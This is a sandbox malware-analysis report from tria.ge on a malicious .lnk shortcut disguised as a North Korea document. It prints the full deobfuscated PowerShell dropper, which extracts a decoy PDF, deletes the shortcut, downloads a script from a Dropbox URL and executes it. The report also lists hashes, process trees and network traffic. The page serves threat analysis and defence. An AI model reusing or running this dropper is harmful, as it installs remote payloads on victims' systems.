Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

34bd483459...f2.lnk

windows7-x64

10

34bd483459...f2.lnk

windows10-2004-x64

10

Analysis

  • max time kernel
    122s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    12/03/2024, 16:22 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    34bd4834595e140c49529abdb5971f000b6750cf3315e63fe9ca95cd2347f9f2.lnk

  • Size

    1.7MB

  • MD5

    21e6ec6dd1e6d3b7abfda04e9189d72d

  • SHA1

    11db057a906824897c8fabcc42f0ba7f88e04f81

  • SHA256

    34bd4834595e140c49529abdb5971f000b6750cf3315e63fe9ca95cd2347f9f2

  • SHA512

    a741dc0b33a8ab2860f4279563b2baf29ab74e9f0d7a033fc39ffe3d0969d5e3cc8ec77b1e9ff4051a0ec83f267ff6ab2980bbafb90f3d7e4f5663ae4aac4190

  • SSDEEP

    24576:b74C5wFv9TW5mFiS3h+nP8etAercYKyLgLgybuEDcqbzZBqnATq9HlMhwLo:QC6LBFiS301AYwsySED9bzyFghwM

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
1
$dirpath = get-location
2
if ($dirpath -match "System32" -or $dirpath -match "Program Files" -or $dirpath -eq "") {
3
$dirpath = $env:temp
4
}
5
$files = get-childitem -path $dirpath -recurse -filter "General view of North Korea 240226.lnk"
6
$lnkfilepath = ""
7
foreach ($file in $files) {
8
$lnkfilepath = $file.fullname
9
}
10
$startaddress = 0
11
$filebytes = get-content -path $lnkfilepath -encoding byte -raw
12
$a5 = 0x50
13
$b4 = 0x4b
14
$c3 = 0x03
15
$d4 = 0x04
16
for ($i = 0; $i -lt $filebytes.length; $i++) {
17
if ($filebytes[$i] -eq $a5) {
18
if ($filebytes[$i + 1] -eq $b4) {
19
if ($filebytes[$i + 2] -eq $c3) {
20
if ($filebytes[$i + 3] -eq $d4) {
URLs
ps1.dropper

https://dl.dropboxusercontent.com/scl/fi/rcrb1ffz4k4pdxpuqluz7/september.txt?rlkey=ja42pzxka70vflanu9xkgmoj8&dl=0

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\34bd4834595e140c49529abdb5971f000b6750cf3315e63fe9ca95cd2347f9f2.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1784
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\SysWOW64\cmd.exe" /k for /f "tokens=*" %a in ('dir C:\Windows\SysWow64\*rshell.exe /s /b /od') do call %a -WindowStyle Minimized "$DirPath=Get-Location;if ($DirPath -Match 'System32' -or $DirPath -Match 'Program Files' -or $DirPath -eq '') { $DirPath = $env:TEMP; } $Files = Get-ChildItem -Path $DirPath -Recurse -Filter 'General view of North Korea 240226.lnk';$lnkFilePath = '';foreach ($File in $Files) {$lnkFilePath = $File.FullName;};$startAddress = 0; $fileBytes = Get-Content -Path $lnkFilePath -Encoding Byte -Raw;$a5=0x50;$b4=0x4b;$c3=0x03;$d4=0x04; for ($i = 0; $i -lt $fileBytes.Length; $i++){ if ($fileBytes[$i] -eq $a5){if ($fileBytes[$i+1] -eq $b4){if ($fileBytes[$i+2] -eq $c3){if ($fileBytes[$i+3] -eq $d4){$startAddress = $i + 4 ;break;}}}}}$byteCount = 24941643;$NormalFileName = $lnkFilePath -replace 'lnk', 'pdf';$selectedBytes = $fileBytes[$startAddress..($startAddress + $byteCount - 1)];Set-Content -Path $NormalFileName -Value $selectedBytes -Encoding Byte; ii $NormalFileName; $i = $i + $byteCount;for ($j = $i; $j -lt $fileBytes.Length; $j++){ if ($fileBytes[$j] -eq 0x55){if ($fileBytes[$j+1] -eq 0x8B){if ($fileBytes[$j+2] -eq 0xEC){if ($fileBytes[$j+3] -eq 0x83){$SecondAddress = $j;break;}}}}}$byteCount=889858; $Resource = $fileBytes[$SecondAddress..($SecondAddress + $byteCount - 1)];Remove-Item -Path $lnkFilePath -Recurse -Force; $webClient = New-Object Net.WebClient;$string = $webClient.DownloadString('https://dl.dropboxusercontent.com/scl/fi/rcrb1ffz4k4pdxpuqluz7/september.txt?rlkey=ja42pzxka70vflanu9xkgmoj8&dl=0');$scriptBlock = [scriptblock]::Create($string);& $scriptBlock;" && cls &&exit
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of WriteProcessMemory
      PID:2408
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c dir C:\Windows\SysWow64\*rshell.exe /s /b /od
        3⤵
          PID:2516
        • C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Minimized "$DirPath=Get-Location;if ($DirPath -Match 'System32' -or $DirPath -Match 'Program Files' -or $DirPath -eq '') { $DirPath = $env:TEMP; } $Files = Get-ChildItem -Path $DirPath -Recurse -Filter 'General view of North Korea 240226.lnk';$lnkFilePath = '';foreach ($File in $Files) {$lnkFilePath = $File.FullName;};$startAddress = 0; $fileBytes = Get-Content -Path $lnkFilePath -Encoding Byte -Raw;$a5=0x50;$b4=0x4b;$c3=0x03;$d4=0x04; for ($i = 0; $i -lt $fileBytes.Length; $i++){ if ($fileBytes[$i] -eq $a5){if ($fileBytes[$i+1] -eq $b4){if ($fileBytes[$i+2] -eq $c3){if ($fileBytes[$i+3] -eq $d4){$startAddress = $i + 4 ;break;}}}}}$byteCount = 24941643;$NormalFileName = $lnkFilePath -replace 'lnk', 'pdf';$selectedBytes = $fileBytes[$startAddress..($startAddress + $byteCount - 1)];Set-Content -Path $NormalFileName -Value $selectedBytes -Encoding Byte; ii $NormalFileName; $i = $i + $byteCount;for ($j = $i; $j -lt $fileBytes.Length; $j++){ if ($fileBytes[$j] -eq 0x55){if ($fileBytes[$j+1] -eq 0x8B){if ($fileBytes[$j+2] -eq 0xEC){if ($fileBytes[$j+3] -eq 0x83){$SecondAddress = $j;break;}}}}}$byteCount=889858; $Resource = $fileBytes[$SecondAddress..($SecondAddress + $byteCount - 1)];Remove-Item -Path $lnkFilePath -Recurse -Force; $webClient = New-Object Net.WebClient;$string = $webClient.DownloadString('https://dl.dropboxusercontent.com/scl/fi/rcrb1ffz4k4pdxpuqluz7/september.txt?rlkey=ja42pzxka70vflanu9xkgmoj8&dl=0');$scriptBlock = [scriptblock]::Create($string);& $scriptBlock;"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2708

    Network

    • flag-us
      DNS
      dl.dropboxusercontent.com
      powershell.exe
      Remote address:
      8.8.8.8:53
      Request
      dl.dropboxusercontent.com
      IN A
      Response
      dl.dropboxusercontent.com
      IN CNAME
      edge-block-www-env.dropbox-dns.com
      edge-block-www-env.dropbox-dns.com
      IN A
      162.125.64.15
    • 162.125.64.15:443
      dl.dropboxusercontent.com
      tls
      powershell.exe
      359 B
       219 B
       5
      5
    • 162.125.64.15:443
      dl.dropboxusercontent.com
      tls
      powershell.exe
      359 B
       219 B
       5
      5
    • 8.8.8.8:53
      dl.dropboxusercontent.com
      dns
      powershell.exe
      71 B
       132 B
       1
      1

      DNS Request

      dl.dropboxusercontent.com

      DNS Response

      162.125.64.15

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2708-38-0x0000000073E90000-0x000000007443B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/2708-39-0x0000000073E90000-0x000000007443B000-memory.dmp

      Filesize

      5.7MB

      Download

    • memory/2708-40-0x0000000002310000-0x0000000002350000-memory.dmp

      Filesize

      256KB

      Download

    • memory/2708-41-0x0000000002310000-0x0000000002350000-memory.dmp

      Filesize

      256KB

      Download

    • memory/2708-42-0x0000000073E90000-0x000000007443B000-memory.dmp

      Filesize

      5.7MB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.